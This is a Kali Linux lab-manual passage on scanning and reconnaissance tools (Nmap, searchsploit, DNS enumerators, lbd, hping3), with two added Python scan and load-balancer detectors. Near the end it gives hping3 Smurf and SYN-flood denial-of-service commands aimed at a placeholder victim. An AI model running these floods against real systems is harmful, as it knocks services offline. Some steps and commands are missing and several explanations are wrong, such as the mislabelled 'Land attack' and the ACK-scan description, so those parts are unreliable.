Laboratory Setup: Step 1: Download Metasploitable, Which Is A Linux Machine. It Can Be Downloaded From
Rosetta, 2021
Laboratory Setup
In this section, we will set up another test machine on which to run the tests with the tools of
Kali Linux.
Step 2: Register by supplying your details. After filling in the form above, we can
download the software.
Step 4: Click “Use an existing virtual hard disk file”. Browse to the file where you
downloaded Metasploitable and click Open.
Output
Nmap provides four possible output formats. All but the interactive output are saved to a file. Nmap output can be
manipulated by text-processing software, enabling the user to create customized reports.
Interactive: Presented and updated in real time when a user runs Nmap from the command line. Various
options can be entered during the scan to facilitate monitoring.
XML: A format that can be further processed by XML tools. It can be converted into an HTML report
using XSLT.
Grepable: Output that is tailored to line-oriented processing tools such as grep, sed or awk.
Normal: The output as seen while running Nmap from the command line, but saved to a file.
Script kiddie: Meant as an amusing way to format the interactive output, replacing letters with visually
similar digits. For example, Interesting ports becomes Int3rest1ng p0rtz.
Stealth Scan
A stealth scan, or SYN scan, is also known as a half-open scan, as it doesn’t complete the TCP three-way handshake. A
hacker sends a SYN packet to the target; if a SYN/ACK frame is received back, it is assumed that the target
would complete the connection and that the port is listening. If an RST is received back from the target, the
port is assumed to be inactive or closed.
Now, to see the SYN scan in practice, use the -sS parameter in Nmap. Following is the full command:
The following table gives the flags, data length and TTL for the different scan methods:
Scan type      Flags sent (→) / received (←)              Data length   TTL
-sT (TCP)      SYN →, ← SYN,ACK, ACK →, RST,ACK →         60            64
               RST
-sF (Finish)   FIN →                                      40            <64 (less than 64)
-sN (Null)     NULL →                                     40            <64 (less than 64)
-sX (Xmas)     FIN, PSH, URG →                            40            <64 (less than 64)
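As an added example, not part of the lab manual, the following Python detector applies the table above from the defender's side: it names the abnormal flag combinations (-sF, -sN, -sX) and counts SYN → SYN/ACK → RST exchanges that never carry the final ACK, the half-open pattern of -sS. The packet records and addresses are a constructed format, not a real capture.

```python
from collections import Counter

# Flag combinations from the table above (constructed lookup for this example).
PROBE_SIGNATURES = {
    frozenset({"FIN"}): "-sF (FIN)",
    frozenset(): "-sN (NULL)",
    frozenset({"FIN", "PSH", "URG"}): "-sX (Xmas)",
}

def classify_probe(flags):
    """Name the scan type for an abnormal flag set, or None for normal flags."""
    return PROBE_SIGNATURES.get(frozenset(flags))

def find_half_open_scanners(packets, threshold=3):
    """Detect the -sS pattern: SYN -> SYN/ACK -> RST with no final ACK.
    Each packet is a dict with src, dst, sport, dport and a flags list
    (a constructed record format standing in for a sensor export)."""
    state = {}             # (src, dst, sport, dport) -> handshake stage
    half_open = Counter()  # source address -> half-open probes seen
    for p in packets:
        flags = set(p["flags"])
        key = (p["src"], p["dst"], p["sport"], p["dport"])
        rkey = (p["dst"], p["src"], p["dport"], p["sport"])
        if flags == {"SYN"}:
            state[key] = "syn"
        elif flags == {"SYN", "ACK"} and state.get(rkey) == "syn":
            state[rkey] = "synack"          # target port is listening
        elif flags == {"RST"} and state.get(key) == "synack":
            half_open[p["src"]] += 1        # torn down before the ACK
            del state[key]
        elif flags == {"ACK"} and state.get(key) == "synack":
            del state[key]                  # full connect, the -sT pattern
    return {src: n for src, n in half_open.items() if n >= threshold}

def _exchange(client, server, sport, dport, final):
    """Constructed three-packet exchange; `final` is the client's last flag."""
    return [
        {"src": client, "dst": server, "sport": sport, "dport": dport, "flags": ["SYN"]},
        {"src": server, "dst": client, "sport": dport, "dport": sport, "flags": ["SYN", "ACK"]},
        {"src": client, "dst": server, "sport": sport, "dport": dport, "flags": [final]},
    ]

# Constructed sample: 10.0.0.5 half-opens three ports; 10.0.0.7 completes a connect.
SAMPLE_PACKETS = (
    _exchange("10.0.0.5", "10.0.0.9", 40001, 22, "RST")
    + _exchange("10.0.0.5", "10.0.0.9", 40002, 80, "RST")
    + _exchange("10.0.0.5", "10.0.0.9", 40003, 443, "RST")
    + _exchange("10.0.0.7", "10.0.0.9", 50000, 80, "ACK")
)
```

A server's RST,ACK answer to a SYN on a closed port never matches a tracked state and is ignored, so only listening ports that were probed and then torn down count toward the threshold.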
Searchsploit
Searchsploit is a tool that lets Kali Linux users search the Exploit Database archive directly from the
command line.
To open it, go to Applications -> 08-Exploitation Tools -> searchsploit, as shown in the following screenshot.
Introduction to SearchSploit
Included in the Exploit Database repository on GitHub is “searchsploit”, a command line search tool for
Exploit-DB that also allows you to take a copy of the Exploit Database with you, everywhere you go. SearchSploit
gives you the power to perform detailed offline searches through your locally checked-out copy of the
repository. This capability is particularly useful for security assessments on segregated or air-gapped networks
without Internet access.
Since we are using the GNOME build of Kali Linux, the “exploitdb” package is already included by
default; all we need to do is open the terminal, type “searchsploit” and press Enter. You will be welcomed by
its help screen.
Kali Linux
If you are using the standard GNOME build of Kali Linux, the exploitdb package is already included by default!
However, if you are using the Kali Light variant or your own custom-built ISO, you can install the package
manually as follows:
# apt update && apt -y install exploitdb
You may wish to install some other related packages: exploitdb-papers and exploitdb-bin-sploits.
# apt -y install exploitdb-bin-sploits exploitdb-papers
Updating SearchSploit
Regardless of how you installed SearchSploit, all you need to do in order to update it is run the following:
# searchsploit -u
If you are using the Kali Linux package and haven’t updated since before 20 September 2016 (shame on you),
you will first need to update the package in the traditional manner:
# apt update && apt -y full-upgrade
Help Screen
By using -h, you can see all the features and options that are available to you:
# searchsploit -h
Basic Search
Simply add any number of search terms you wish to look for:
# searchsploit afd windows local
Title Searching
By default, searchsploit will check BOTH the title of the exploit as well as the path. Depending on the search
criteria, this may bring up false positives (especially when searching for terms that match platforms and version
numbers). Searches can be restricted to the titles by using the -t option:
# searchsploit -t oracle
# searchsploit -t oracle windows
Removing Unwanted Results
We can remove unwanted results by using the --exclude option. We are also able to remove multiple terms by
separating the value with a | (pipe). This can be demonstrated by the following:
# searchsploit linux kernel 3.2 --exclude="(PoC)|/dos/"
Piping Output (Alternative Method of Removing Unwanted Results)
The output from searchsploit can be piped into any other program, which is especially useful when outputting
the results in JSON format (using the -j option). With this, it is possible to remove any unwanted exploits by
using grep. In the following example, we use grep to filter out any "Denial of Service (DoS)" results.
# searchsploit XnView | grep -v '/dos/'
Colour Output
By default, searchsploit highlights the search terms in the results when they are displayed to the user. This
works by inserting invisible characters into the output before and after the colour changes.
Now, if you were to pipe the output (for example, into grep) and try to match a phrase that spans highlighted and
non-highlighted text, it would not be successful. This can be solved by disabling the highlighting with the
--colour option (--color works as well).
# searchsploit wordpress mail list --colour
Copy To Clipboard
So now that we have found the exploit we are looking for, there are various ways to access it quickly.
By using -p, we are able to get some more information about the exploit, as well as copy the complete path to
the exploit onto the clipboard:
# searchsploit 39446
# searchsploit -p 39446
Copy To Folder
We recommend that you do not alter the exploits in your local copy of the database. Instead, make a copy of
the ones that are of interest and use them from a working directory. By using the -m option, we are able to select as
many exploits as we like to be copied into the folder we are currently in:
# searchsploit MS14-040
# searchsploit -m MS14-040
Examine an Exploit
The --examine option opens the selected exploit in $PAGER so that you can read through its functionality.
# searchsploit 39166 --examine
Examining Nmap results
The -x option enables the examine parameter, and the --nmap option reads an Nmap XML output file (produced
with service version detection) and checks every result in it for related exploits.
# searchsploit -x --nmap result.xml
Case Sensitive
The -c option enables a case-sensitive search, matching exactly the characters given in the command; by
default the search is case-insensitive. Consider the following example:
# searchsploit xss
# searchsploit -c XSS
Exploit-DB Online
The Exploit Database repository is the core of Exploit-DB, making SearchSploit efficient and easy to use.
However, some of the exploit metadata (such as screenshots, setup files, tags and vulnerability mappings) is
not included. To access it, you will need to check the website.
You can quickly generate the links to exploits of interest by using the -w option:
# searchsploit WarFTP 1.65 -w
DNS Tools
We will learn how to use some of the DNS tools that Kali incorporates. Basically, these tools help with zone transfers
and domain/IP resolution issues.
dnsenum.pl
The first tool is dnsenum.pl, a Perl script that retrieves the MX, A and other records connected to a
domain.
Open the terminal and type “dnsenum domain-name”; all the records will be shown. In this case, it shows the
A records.
# dnsenum --enum google.com
Enumeration of Subdomains
When we run this command, it will perform a brute-force search for subdomains using the custom wordlist passed
as an argument.
# vi subdomain.txt
    mail
    www
    webmail
    service
    web
Save and exit.
# dnsenum -f subdomain.txt -r google.com
DNSMAP
The second tool is DNSMAP, which helps to find the phone numbers, contacts and other subdomains connected
to the domain we are searching. Following is an example.
Click the terminal as in the upper section, then type “dnsmap domain-name”.
# dnsmap google.com
To save the output for later use in the pentest, rather than just viewing the results on the Linux console,
write it to a .txt file:
# dnsmap google.com -r /root/Desktop/dnsmapoutput.txt
Download a wordlist from the following link and use it with the -w option, as shown below:
http://www.md5this.com/tools/wordlists.html
dnsmap command with a wordlist:
# dnsmap target-domain.foo -w yourwordlist.txt -r /tmp/domainbf_results.txt
dnstracer
The third tool is dnstracer, which determines where a given Domain Name Server (DNS) gets its information
from for a given hostname.
Click the terminal as in the upper section, then type “dnstracer domain-name”.
# dnstracer google.com
Dnstracer is a DNS information-gathering tool that extracts unique DNS information about a
domain. It extracts different types of DNS records, such as NS, MX, A, AAAA, SOA and NSEC.
DNS query for the A records.
# dnstracer -v -o google.com
-v verbose mode, showing the requests and answers going back and forth.
-a shows a summary of the domain scan.
-o enables an overview of the received answers.
The above query shows the DNS headers and header fields.
DNS query for the SOA records.
# dnstracer -q soa -o -4 google.com
-q means DNS record type (here DNS record type is SOA)
-o print the summary on the console
-4 means ignore IPv6
DNS query for the NS(Name Server) records.
# dnstracer -q ns -o -4 google.com
DNS query for the MX(Mail Exchange) records.
# dnstracer -q mx -o -4 google.com
LBD Tools
lbd (load balancing detector) detects if a given domain uses DNS and/or HTTP Load-Balancing (via Server: and
Date: header and diffs between server answers).
DNS load balancing
In DNS load balancing, a system has a list of IPs that can respond to requests. When you request a resource, you
hit on one of these IPs, and you need to test further to identify the exact target. If your target is example.com,
and 3 IPs are serving that, when you find a vulnerability, you still have to determine which of these addresses is
the vulnerable one (or if all are).
HTTP load balancing
One of the ways HTTP load balancing can be achieved is through cookies. This comes in handy in online stores
and other such web applications that need to identify a client and send it to the same specific resource.
DNS and HTTP load balancing
# lbd google.com
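As an added example, not part of the lab manual or of lbd itself, the following Python code reproduces the two checks that lbd's description above names: more than one A record for DNS load balancing, and Server: or Date: headers that diverge across successive HTTP responses. The A records and response headers are constructed sample data.

```python
from email.utils import parsedate_to_datetime

def detect_dns_lb(a_records):
    """DNS load balancing: the name resolves to more than one distinct address."""
    return len(set(a_records)) > 1

def detect_http_lb(responses, max_skew_seconds=2):
    """HTTP load balancing, lbd-style: either the Server: header differs between
    answers, or the Date: header jumps backwards by more than `max_skew_seconds`
    between consecutive answers (a single server's clock only moves forwards).
    `responses` are header dicts in request order. Returns a reason or None."""
    servers = {r.get("Server", "") for r in responses}
    if len(servers) > 1:
        return "Server header differs: %s" % sorted(servers)
    dates = [parsedate_to_datetime(r["Date"]) for r in responses if "Date" in r]
    for prev, cur in zip(dates, dates[1:]):
        delta = (cur - prev).total_seconds()
        if delta < -max_skew_seconds:
            return "Date header went backwards by %ds" % -delta
    return None

# Constructed sample data: two addresses in rotation, and three responses where
# the third came from a backend whose clock is 21 seconds behind the others.
SAMPLE_A_RECORDS = ["198.51.100.10", "198.51.100.11", "198.51.100.10"]
SAMPLE_RESPONSES = [
    {"Server": "nginx", "Date": "Tue, 02 Mar 2021 10:00:00 GMT"},
    {"Server": "nginx", "Date": "Tue, 02 Mar 2021 10:00:01 GMT"},
    {"Server": "nginx", "Date": "Tue, 02 Mar 2021 09:59:40 GMT"},
]
SINGLE_SERVER = [
    {"Server": "nginx", "Date": "Tue, 02 Mar 2021 10:00:00 GMT"},
    {"Server": "nginx", "Date": "Tue, 02 Mar 2021 10:00:01 GMT"},
]
```

Identical Server: headers with tightly synchronised backend clocks defeat this heuristic, which is why lbd also compares differences between the full answers.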
Hping3
Hping3 is widely used by ethical hackers. It is similar to the ping tool but more advanced, as it can bypass
firewall filters and use the TCP, UDP, ICMP and RAW-IP protocols. It has a traceroute mode and the ability to
send files over a covert channel.
While hping was mainly used as a security tool in the past, it can be used in many ways by people who don’t
care about security to test networks and hosts. A subset of the things you can do using hping:
Firewall testing
Advanced port scanning
Network testing, using different protocols, TOS, fragmentation
Manual path MTU discovery
Advanced traceroute, under all the supported protocols
Remote OS fingerprinting
Remote uptime guessing
TCP/IP stacks auditing
hping can also be useful to students that are learning TCP/IP.
1. Testing ICMP: In this example hping3 behaves like a normal ping utility, sending ICMP echo requests and
receiving ICMP echo replies.
# hping3 -1 google.com
2. Traceroute using ICMP: This example is similar to well-known utilities like tracert (Windows) or traceroute
(Linux), which use ICMP packets whose TTL value is increased by 1 each time.
# hping3 --traceroute -V -1 google.com
3. Checking a port: Here hping3 sends a SYN packet to a specified port (80 in our example). We can also control
the local port from which the scan starts (5050).
# hping3 -V -S -p 80 -s 5050 google.com
4. Traceroute to a specific port: A nice feature of hping3 is that you can do a traceroute to a specified port
and watch where your packet is blocked. It can be done just by adding --traceroute to the last command.
# hping3 --traceroute -V -S -p 80 -s 5050 google.com
5. Other types of ICMP: This example sends an ICMP address mask request (Type 17).
# hping3 -c 1 -V -1 -C 17 google.com
6. Other types of port scanning: The first type we will try is the FIN scan. In a TCP connection the FIN flag is used
to start the connection-closing routine. If we do not receive a reply, that means the port is open. Normally
firewalls send an RST+ACK packet back to signal that the port is closed.
# hping3 -c 1 -V -p 80 -s 5050 -F google.com
7. ACK scan: This scan can be used to see if a host is alive (when ping is blocked, for example). This should send
an RST response back if the port is open.
# hping3 -c 1 -V -p 80 -s 5050 -A google.com
8. Xmas scan: This scan sets the sequence number to zero and sets the URG, PSH and FIN flags in the packet. If
the target device's TCP port is closed, the target device sends a TCP RST packet in reply. If the target device's
TCP port is open, the target discards the TCP Xmas scan, sending no reply.
# hping3 -c 1 -V -p 80 -s 5050 -M 0 -UPF google.com
9. Null scan: This scan sets the sequence number to zero and has no flags set in the packet. If the target
device's TCP port is closed, the target device sends a TCP RST packet in reply. If the target device's TCP port is
open, the target discards the TCP NULL scan, sending no reply.
# hping3 -c 1 -V -p 80 -s 5050 -Y google.com
10. Smurf Attack: This is a type of denial-of-service attack that floods a target system via spoofed broadcast
ping messages.
# hping3 -1 --flood -a VICTIM_IP BROADCAST_ADDRESS
11. DOS Land Attack:
# hping3 -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 --flood --rand-source VICTIM_IP
--flood: send packets as fast as possible. Don't show replies.
--rand-dest: random destination address mode. See the man page.
-V <-- Verbose
-c --count: packet count
-d --data: data size
-S --syn: set SYN flag
-w --win: winsize (default 64)
-p --destport [+][+]<port> destination port(default 0) ctrl+z inc/dec
-s --baseport: base source port (default random)